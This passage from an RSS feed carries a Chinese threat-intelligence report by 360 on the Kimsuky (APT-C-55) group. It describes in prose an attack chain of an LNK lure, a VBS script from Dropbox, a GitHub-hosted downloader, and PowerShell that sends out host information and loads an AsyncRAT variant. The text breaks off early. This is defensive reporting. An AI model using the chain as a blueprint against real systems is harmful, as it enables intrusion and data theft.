<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>360威胁情报中心</title>
    <link>https://wechat2rss.xlab.app/feed/920f171e3dae0c8eeb4c97b366b229ba19807732.xml</link>
    <description>360威胁情报中心是全球领先的威胁情报共享、分析和预警平台，依托360安全大脑百亿级样本，万亿级防护日志等海量安全数据，整合360漏洞挖掘、恶意代码分析、威胁情报追踪等团队的安全能力，产出高质量的安全威胁情报，驱动安全的防御、检测和响应。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (360威胁情报中心)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM6ZK2DRam9aQ0pxBMyaibQ7dQAv6FGxgBwRibZZUkRlJB4A/0</url>
      <title>360威胁情报中心</title>
      <link>https://wechat2rss.xlab.app/feed/920f171e3dae0c8eeb4c97b366b229ba19807732.xml</link>
    </image>
    <item>
      <title>APT-C-55（Kimsuky）组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508584&amp;idx=1&amp;sn=3983faed8f799809ecc23eb552e73548</link>
      <description>一次看似 “正常下载” 的流程，背后是一条用 Dropbox → GitHub → PowerShell → .NET 反射 串起来的分层投递链；前脚回传主机画像，后脚按需下发 AsyncRAT 插件。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-05-13 17:33</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=41ed00ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXJN517ZgzAOXqdc9ibOz1W8DfhAicPEPYdE47cUdUIoGgygMkwLO3icicYfFlJ6ffTO1ichibKqv3vxd0BXpGDSGmPdUVFtGUoXicAazg%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>一次看似 “正常下载” 的流程，背后是一条用 Dropbox → GitHub → PowerShell → .NET 反射 串起来的分层投递链；前脚回传主机画像，后脚按需下发 AsyncRAT 插件。</p>
  <div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="box-sizing: border-box;padding:1em 1em;"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid #be191f;box-sizing: border-box;"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding: 0px 0em 3px;color: #322828;margin-left: 12px;border-bottom: 1px solid #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">APT-C-55</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding: 4px 0em 0px;color: #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">Kimsuky</span></strong></span></p></div></div><div data-autoskip="1"><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;text-align: justify;"><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">A</span></font></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">PT-C-55（</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;style&#34;:&#34;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;padding:1em 1em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-autoskip&#34;:&#34;1&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;margin-bottom: 16px;margin-top: 16px;text-align: justify;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">Kimsuky</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">），又被称为BabyShark</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">等，</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">最早由</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Kaspersky在2013年公开披露。该组织长期针对朝鲜半岛目标国家的政府机构、外交部门、智库、媒体以及学术机构开展网络攻击活动，随后其攻击范围逐步扩大至包括北美洲、欧洲及其他地区的目标。Kimsuky组织主要以情报窃取为核心目的，持续通过鱼叉式网络钓鱼等方式获取敏感信息。</span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">近年来，该组织在攻击手法上不断演进，常利用恶意文档（如HWP、Office宏文件）、脚本加载器、LNK文件以及多阶段载荷等</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">方式进行入侵，并结合自研恶意工具与开源工具实施持久化控制。尽管其活动多次被安全厂商披露，但该组织依然保持较高活跃度，持续调整战术与技术手段，在隐蔽性和攻击链复杂度方面呈现不断增强的趋势。</span></font></p></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="105196"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">一、攻击活动分析</span></span></strong></p></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="paragraph"><h2 data-pm-slice="0 0 []" style="margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">1. </span></span><b><font face="黑体"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">攻击流程分析</span></span></font></b></h2><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3997395833333333" data-s="300,640" data-type="png" data-w="768" type="block" data-imgfileid="100024935" src="https://wechat2rss.xlab.app/img-proxy/?k=699c4ad8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKMVD7qq3UZbAAH7x9O8ZzwiaHSic0hhyncTXdTSTeAyIN82DE5gVoNGU3vQvKZXSgR4MccTGjPSWnHic9kicibU7Ltpu2K1PsAndm8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><span data-pm-slice="0 0 []"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Kimsuky</span></span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">通过</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">lnk文件</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">发起钓鱼攻击。用户</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">点击运行后</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">lnk文件携带的脚本会从自身解密出诱饵文件并打开，以此迷惑受害者，同时从Drop</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">box</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">下载</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">ta</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">skschd.vbs</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本执行恶意功能，该</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">v</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">bs</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">继续从攻击者的</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Gi</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">thub</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">仓库下载</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">do</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">wnloader</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本执行</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">,downloader</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">继续下载两个</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">p</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">o</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">w</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">ershell</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本，功能分别是上传受害者电脑基本信息到攻击者仓库，同时创建计划任务执行</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">ta</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">skschd.vbs</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，另一个</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">p</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">s1</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本下载加密数据并解密出</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">AsyncRAT变体</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">用于窃取敏感信息。</span></font></p><h2 style="text-indent: 0px;" data-pm-slice="0 0 []"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">2. </span></span><b><font face="黑体"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">载荷投递分析</span></span></font></b></h2><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">本次捕获样本</span></font></span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">名为</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, 